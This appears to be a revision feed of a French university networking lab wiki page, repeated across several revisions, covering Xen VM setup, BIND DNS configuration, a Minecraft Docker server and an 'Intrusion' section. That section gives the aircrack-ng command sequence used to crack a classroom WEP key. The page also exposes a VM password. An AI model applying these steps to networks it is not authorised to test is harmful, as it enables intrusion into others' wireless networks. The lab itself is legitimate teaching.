		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60058"/>
				<updated>2022-11-28T09:59:20Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Minecraft.png]]&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60051</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60051"/>
				<updated>2022-11-28T09:43:52Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : /* Intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60050</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60050"/>
				<updated>2022-11-28T09:42:45Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : /* Sommaire */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
